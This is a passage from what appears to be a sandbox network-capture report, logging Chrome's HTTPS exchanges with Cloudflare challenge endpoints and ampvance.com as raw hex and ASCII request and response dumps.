                                                      2024-03-05 13:23:41 UTC3243OUTData Raw: 76 5f 38 35 66 61 36 62 36 39 61 65 64 38 31 37 62 31 3d 72 77 6f 6b 46 6e 45 35 74 4f 6f 45 6f 6e 55 52 71 5a 6c 5a 25 32 62 38 63 45 51 5a 37 39 5a 4a 5a 55 41 52 33 5a 48 5a 63 41 6f 5a 33 55 5a 59 6e 5a 52 2d 6b 5a 24 5a 4f 4c 2d 38 74 6e 76 7a 24 5a 39 6b 38 55 5a 62 74 53 5a 45 36 5a 4a 66 74 5a 57 6b 4a 64 55 4a 5a 44 65 4f 5a 66 6b 63 38 37 5a 72 2d 2d 5a 39 35 4c 41 5a 30 67 72 6e 6c 71 63 5a 4c 6b 5a 66 5a 43 30 54 24 4c 43 5a 44 67 2d 45 48 2d 6b 45 37 45 5a 69 2d 6e 44 5a 57 41 5a 4a 5a 63 56 5a 64 2d 45 6a 35 41 5a 6a 5a 4a 55 45 2d 6b 5a 50 5a 5a 54 69 5a 44 63 5a 2b 62 63 6c 5a 5a 56 50 4f 4a 36 6e 43 75 54 6e 36 46 6e 5a 55 31 30 4f 53 67 6c 30 75 4a 30 5a 57 2d 6e 5a 61 57 7a 6f 63 63 4c 5a 76 50 6f 5a 47 69 35 52 2d 6c 2d 73 6b 38 58 64
                                                      Data Ascii: v_85fa6b69aed817b1=rwokFnE5tOoEonURqZlZ%2b8cEQZ79ZJZUAR3ZHZcAoZ3UZYnZR-kZ$ZOL-8tnvz$Z9k8UZbtSZE6ZJftZWkJdUJZDeOZfkc87Zr--Z95LAZ0grnlqcZLkZfZC0T$LCZDg-EH-kE7EZi-nDZWAZJZcVZd-Ej5AZjZJUE-kZPZZTiZDcZ+bclZZVPOJ6nCuTn6FnZU10OSgl0uJ0ZW-nZaWzoccLZvPoZGi5R-l-sk8Xd
                                                      2024-03-05 13:23:41 UTC1268INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:23:41 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      set-cookie: cf_chl_rc_m=;Expires=Mon, 04 Mar 2024 13:23:41 GMT;SameSite=Strict
                                                      cf-chl-out: UfJ8E0l/Ufbs7zhVmBU/8JX+QeTh2mwmZ+0Wsc1m1L88IIQedw/R4oAGY45fwTjTm4vmY4th/vIaTckmmNIk/g==$q+J5JTZxt9WG1bMC79LqpA==
                                                      cf-chl-out-s: sqF3fjgDmh4gltJ0IJ/iFI6fh+BHrQK1cdWI0VksV22y3ZJaPJaX22HMVdJ1NyI+VsXRvE+MoMKLMcrxOK59hghpNJeA7M5RT8R3/0WMoZcKxY5cNHp7KSsQxLNEudRHyz56eu1bsz60VutK0onaXaNy+D1yxZBDeL5XcSuYEu+NEpuEOdWPowEi/M1JLiHQnQMonbjLwaWJP/3dQ4jhbVcjkGeGqolE6bnzNCazUOhoWsXn2YooragYwv3xMx7xXiW3I6/ZVXKgNthB50HLatCzU9Q3EuRx/DplRgSFpYQi10g2nLR1Wo3BvWfFN+9r7Rgjyc7JM93BIE5vANYic5HRgR0wGi0hwU2gw5TBNmyrVU3Wt4BleBTCykYmUZn6JdsNg7FxbnZDoiEgIrAn29s62fmII8OVkc5m46HAe/ACNm2a059fbIMoQCmOzS8rGdMyK0JmvRLzXlWihC4HmQ==$O8VDWlVHgdGxz5+zSoKneQ==
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6ZXKWq3cLz3MLbLnHu8q%2BxrPMDDkRnp0HlQjt3s7%2FZ07z4LMrpYR4c8qb%2B0VNRWR3nFYrmh8Ske688DibxM8%2B3vvmt4%2BUYe8kz8pvy3pQJGF3eAhy3Q9MDtjN2t0ImQ%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6c07b92a8c72-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:41 UTC101INData Raw: 65 30 30 0d 0a 69 56 75 50 68 6c 74 2f 6b 57 78 7a 54 59 32 4a 64 6e 5a 6d 65 49 65 61 6a 48 70 72 57 4b 47 50 66 34 43 64 66 49 4f 46 70 5a 75 4b 5a 47 71 45 6a 35 2b 79 62 34 71 53 63 71 78 71 6b 70 61 56 62 70 61 61 6c 34 75 59 74 4a 53 57 6a 35 2b 36 74 72 65 34 76 4a 71 45 68 71 2b 72 6e 6f 36 78
                                                      Data Ascii: e00iVuPhlt/kWxzTY2JdnZmeIeajHprWKGPf4CdfIOFpZuKZGqEj5+yb4qScqxqkpaVbpaal4uYtJSWj5+6tre4vJqEhq+rno6x
                                                      2024-03-05 13:23:41 UTC1369INData Raw: 72 38 6a 42 77 71 65 68 6c 36 7a 46 30 71 32 73 32 39 75 35 73 74 2b 35 76 64 6a 6c 76 63 43 70 36 71 76 6d 70 74 76 53 79 74 4f 7a 70 2b 79 30 79 74 50 73 72 64 58 2b 74 75 6e 59 33 64 50 51 32 2f 45 49 39 75 62 6b 78 63 66 55 43 2f 73 4b 32 4d 66 6e 34 4f 4c 39 42 2b 49 49 31 39 54 6c 47 51 62 61 33 76 58 65 47 50 6b 6c 48 52 38 64 48 65 59 43 43 66 37 72 49 41 76 70 42 41 55 70 4a 52 62 7a 44 51 76 72 38 6a 6b 63 4e 41 6b 32 44 69 38 57 2f 68 67 6a 45 44 63 69 50 51 4e 48 43 69 38 69 49 68 70 51 4d 67 70 51 56 78 45 74 4b 67 77 6e 46 43 63 5a 55 52 39 56 56 45 45 65 48 54 74 50 4f 31 51 37 50 43 68 61 59 47 31 71 52 30 77 2f 56 47 45 2b 62 47 31 4a 53 44 52 47 61 33 64 37 62 6b 39 39 65 6d 35 74 59 6f 52 31 5a 48 70 39 69 55 31 39 65 58 68 48 62 48 74
                                                      Data Ascii: r8jBwqehl6zF0q2s29u5st+5vdjlvcCp6qvmptvSytOzp+y0ytPsrdX+tunY3dPQ2/EI9ubkxcfUC/sK2Mfn4OL9B+II19TlGQba3vXeGPklHR8dHeYCCf7rIAvpBAUpJRbzDQvr8jkcNAk2Di8W/hgjEDciPQNHCi8iIhpQMgpQVxEtKgwnFCcZUR9VVEEeHTtPO1Q7PChaYG1qR0w/VGE+bG1JSDRGa3d7bk99em5tYoR1ZHp9iU19eXhHbHt
                                                      2024-03-05 13:23:41 UTC1369INData Raw: 4c 62 52 33 5a 7a 63 31 72 50 62 72 72 57 77 75 62 43 6b 35 62 7a 47 33 62 36 72 77 38 66 71 7a 4f 66 70 71 37 50 72 32 66 43 33 7a 65 33 4e 38 2f 4b 2b 32 4e 73 45 75 67 41 46 41 50 54 33 78 63 45 48 42 4d 73 52 35 75 58 37 41 39 44 52 37 50 4d 4b 31 4d 7a 7a 45 50 37 57 46 2f 44 72 49 4f 30 61 42 2f 6e 78 43 42 54 63 4a 75 72 33 49 53 63 67 45 68 45 41 43 54 63 58 38 51 34 72 45 51 55 53 44 69 30 34 46 68 30 72 45 44 55 57 45 30 41 62 4a 52 30 56 49 53 6b 6c 48 45 45 69 4c 31 55 70 4d 53 4e 5a 4c 54 56 46 58 44 4a 55 4c 53 6c 50 50 53 38 66 4f 6b 5a 44 59 44 31 46 4e 32 74 62 53 47 55 70 52 69 31 68 64 45 6c 33 54 7a 4e 50 52 55 73 31 61 7a 6c 4c 4f 6d 39 63 65 6a 39 31 67 30 64 63 52 47 6c 44 69 32 57 4c 57 56 78 74 61 32 78 76 58 6b 68 56 62 56 42 6f
                                                      Data Ascii: LbR3Zzc1rPbrrWwubCk5bzG3b6rw8fqzOfpq7Pr2fC3ze3N8/K+2NsEugAFAPT3xcEHBMsR5uX7A9DR7PMK1MzzEP7WF/DrIO0aB/nxCBTcJur3IScgEhEACTcX8Q4rEQUSDi04Fh0rEDUWE0AbJR0VISklHEEiL1UpMSNZLTVFXDJULSlPPS8fOkZDYD1FN2tbSGUpRi1hdEl3TzNPRUs1azlLOm9cej91g0dcRGlDi2WLWVxta2xvXkhVbVBo
                                                      2024-03-05 13:23:41 UTC752INData Raw: 47 32 30 4c 4c 50 7a 37 58 58 70 4e 66 6b 70 65 72 75 71 38 4c 4e 72 73 62 45 76 72 58 55 78 63 4c 73 32 63 65 37 35 2b 44 70 34 50 48 34 75 2f 6e 58 31 4e 37 32 78 41 62 43 77 2b 55 4f 7a 67 34 52 41 4d 62 4c 34 64 58 57 37 74 4c 62 48 51 6e 71 45 76 48 58 34 4f 38 42 38 65 4c 37 46 76 51 4a 33 66 37 33 2f 52 30 50 41 76 7a 72 43 79 77 30 43 67 4d 48 44 43 59 70 39 76 6a 78 44 78 76 36 4f 69 49 53 47 42 45 33 4e 30 49 6b 4b 6b 56 4a 4a 52 78 51 52 7a 55 39 45 41 6c 42 54 6b 34 32 4c 31 51 78 4f 43 6c 43 56 6a 73 37 4d 44 39 6c 52 7a 56 44 50 46 63 6a 4b 44 6c 44 59 7a 49 74 59 6a 46 4d 53 6c 55 79 64 6b 5a 70 50 44 35 36 58 32 31 51 63 55 52 2b 63 49 42 69 66 46 78 68 62 49 4a 66 54 49 47 47 54 33 32 55 64 49 4b 4d 54 33 4a 75 63 35 69 53 58 6c 70 38 65
                                                      Data Ascii: G20LLPz7XXpNfkperuq8LNrsbEvrXUxcLs2ce75+Dp4PH4u/nX1N72xAbCw+UOzg4RAMbL4dXW7tLbHQnqEvHX4O8B8eL7FvQJ3f73/R0PAvzrCyw0CgMHDCYp9vjxDxv6OiISGBE3N0IkKkVJJRxQRzU9EAlBTk42L1QxOClCVjs7MD9lRzVDPFcjKDlDYzItYjFMSlUydkZpPD56X21QcUR+cIBifFxhbIJfTIGGT32UdIKMT3Juc5iSXlp8e
                                                      2024-03-05 13:23:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      26192.168.2.449773104.17.3.1844434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:41 UTC487OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1318590694:1709641463:zSaOyPPd1Tt7Y_AdkvJadIWaaVllOPiN8i5OYGFk-_M/85fa6b76cf6e4369/2573fed2a68f8e4 HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:23:41 UTC386INHTTP/1.1 400 Bad Request
                                                      Date: Tue, 05 Mar 2024 13:23:41 GMT
                                                      Content-Type: application/json
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      cf-chl-out: DWrpgkG7zGfhCnXFM5WoMA==$f+B3QRQ4d4d8ahIMDeiNxw==
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6c0889b443cd-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:41 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                      Data Ascii: 7invalid
                                                      2024-03-05 13:23:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      27192.168.2.449774104.21.81.2294434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:41 UTC1174OUTPOST / HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      Content-Length: 4561
                                                      Cache-Control: max-age=0
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-platform: "Windows"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      Upgrade-Insecure-Requests: 1
                                                      Origin: https://ampvance.com
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-User: ?1
                                                      Sec-Fetch-Dest: document
                                                      Referer: https://ampvance.com/?__cf_chl_tk=3yAfPjzz9mWgpHVStS6F4iNx.u6TsGuIonpQn1.luEg-1709644996-0.0.1.1-1557
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:23:41 UTC4561OUTData Raw: 65 61 31 34 30 39 32 64 37 32 37 61 39 38 37 64 63 63 38 63 36 36 63 64 65 33 61 66 38 34 36 32 34 65 63 66 32 62 64 36 32 33 37 36 32 66 33 37 66 38 33 30 31 38 35 64 38 61 34 65 31 39 61 37 3d 64 62 53 42 38 6c 36 6d 5a 62 32 75 70 61 42 37 41 50 43 42 36 53 49 46 4c 62 4e 42 6c 36 50 61 71 74 48 36 2e 75 4d 49 48 59 77 2d 31 37 30 39 36 34 34 39 39 36 2d 31 2e 31 2e 31 2e 31 2d 4b 5a 76 62 47 66 45 35 73 78 4d 57 6d 71 35 48 48 77 39 35 31 62 45 79 42 67 6e 34 6b 72 53 31 42 46 34 38 54 43 4d 63 51 38 35 4c 32 47 70 4b 67 63 43 57 43 4d 67 34 58 57 4a 42 65 77 77 37 4e 45 7a 71 4a 72 36 76 68 54 43 67 53 4f 73 5a 72 34 31 52 6c 6f 37 57 69 32 6a 71 75 64 64 43 2e 54 37 77 4d 2e 6c 49 73 6d 68 54 75 65 39 44 48 62 42 52 63 4a 6d 55 5f 6d 74 69 43 56 6c
                                                      Data Ascii: ea14092d727a987dcc8c66cde3af84624ecf2bd623762f37f830185d8a4e19a7=dbSB8l6mZb2upaB7APCB6SIFLbNBl6PaqtH6.uMIHYw-1709644996-1.1.1.1-KZvbGfE5sxMWmq5HHw951bEyBgn4krS1BF48TCMcQ85L2GpKgcCWCMg4XWJBeww7NEzqJr6vhTCgSOsZr41Rlo7Wi2jquddC.T7wM.lIsmhTue9DHbBRcJmU_mtiCVl
                                                      2024-03-05 13:23:42 UTC1180INHTTP/1.1 302 Found
                                                      Date: Tue, 05 Mar 2024 13:23:42 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Set-Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; path=/; expires=Wed, 05-Mar-25 13:23:42 GMT; domain=.ampvance.com; HttpOnly; Secure; SameSite=None
                                                      set-cookie: PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d; path=/; secure
                                                      expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      location: ./cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93f
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Y8Z5SZN9KDmI%2BKn%2FMAYmru2wHSbkgooxoVzGRshpR%2B3xVRwza5P0xLsz4P0FrIHQbdACDW5L4qeQVdz9SM3i4h1g9k7ZoO022Nx3h9neMYOdLdt3O9uZirjqFcj07Ow%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6c0b2bfd4297-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      28192.168.2.449775104.21.81.2294434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:41 UTC932OUTGET /favicon.ico HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://ampvance.com/?__cf_chl_tk=3yAfPjzz9mWgpHVStS6F4iNx.u6TsGuIonpQn1.luEg-1709644996-0.0.1.1-1557
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:23:42 UTC1290INHTTP/1.1 403 Forbidden
                                                      Date: Tue, 05 Mar 2024 13:23:42 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Content-Length: 16332
                                                      Connection: close
                                                      Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                      Cross-Origin-Embedder-Policy: require-corp
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Cross-Origin-Resource-Policy: same-origin
                                                      Origin-Agent-Cluster: ?1
                                                      Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                      Referrer-Policy: same-origin
                                                      X-Frame-Options: SAMEORIGIN
                                                      cf-mitigated: challenge
                                                      cf-chl-out: WeF7rs8fW6yTIlp9fgSxTJBEysyZS2qAGWw6Z2psM2dAi+UXzkN1fj0IiXZwP9Kt3zbFT7oL19cIlsCnHsYZIkEtB/9UJC+SA1R2UN7yPDmaKMXEu82UpA0m1uJu1yJzl8TC9qO3jkUsWJ2wqPfeVw==$Hlpd40wfFtUpq4G1EFulZQ==
                                                      Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                      2024-03-05 13:23:42 UTC403INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 59 36 71 39 4f 38 72 63 45 57 32 64 6b 57 55 52 6e 33 75 39 77 76 6a 62 61 53 4c 72 35 25 32 42 39 36 6e 6d 61 5a 72 44 35 70 33 4b 56 25 32 42 34 78 34 52 6a 43 74 54 4b 78 36 6c 59 6c 30 4f 43 4d 65 46 63 55 32 45 75 5a 32 41 58 53 45 78 41 45 76 63 65 69 4b 64 32 63 6b 69 4b 63 49 73 47 4b 53 49 44 44 70 4d 72 69 6d 6a 7a 66 43 74 67 49 6e 47 41 37 59 43 34 69 6e 41 25 32 42 58 6f 46 79 4e 67 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e
                                                      Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Y6q9O8rcEW2dkWURn3u9wvjbaSLr5%2B96nmaZrD5p3KV%2B4x4RjCtTKx6lYl0OCMeFcU2EuZ2AXSExAEvceiKd2ckiKcIsGKSIDDpMrimjzfCtgInGA7YC4inA%2BXoFyNg%3D"}],"group":"cf-nel","max_age":604800}N
                                                      2024-03-05 13:23:42 UTC1045INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                                      Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
                                                      2024-03-05 13:23:42 UTC1369INData Raw: 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54
                                                      Data Ascii: zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMT
                                                      2024-03-05 13:23:42 UTC1369INData Raw: 62 6f 64 79 2e 64 61 72 6b 20 2e 62 69 67 2d 62 75 74 74 6f 6e 2c 62 6f 64 79 2e 64 61 72 6b 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 36 39 33 66 66 3b 63 6f 6c 6f 72 3a 23 31 64 31 64 31 64 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30
                                                      Data Ascii: body.dark .big-button,body.dark .pow-button{background-color:#4693ff;color:#1d1d1d}body.dark #challenge-success-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0
                                                      2024-03-05 13:23:42 UTC1369INData Raw: 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 35 39 35 39 35 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 2e 6c 69 67 68 74 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 66 63 35 37 34 61 7d 62 6f 64 79 2e 6c 69 67 68 74 20 2e 62 69 67 2d 62 75 74 74 6f 6e 2c 62 6f 64 79 2e 6c 69 67 68 74 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 33 36 38 31 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 33 36 38 31 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 2e 6c 69 67 68 74 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67
                                                      Data Ascii: ng div{border-color:#595959 transparent transparent}body.light .font-red{color:#fc574a}body.light .big-button,body.light .pow-button{background-color:#003681;border-color:#003681;color:#fff}body.light #challenge-success-text{background-image:url(data:imag
                                                      2024-03-05 13:23:42 UTC1369INData Raw: 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20 2e 31 35 73 20 65 61 73 65 7d 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 38 72 65 6d 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 68 65 69 67 68 74 3a 32 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 72 65 6d 3b 77 69 64 74 68 3a 32 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74
                                                      Data Ascii: -decoration:none;transition:color .15s ease}a:hover{color:#ee730a;text-decoration:underline}.main-content{margin:8rem auto;max-width:60rem;width:100%}.heading-favicon{height:2rem;margin-right:.5rem;width:2rem}@media (width <= 720px){.main-content{margin-t
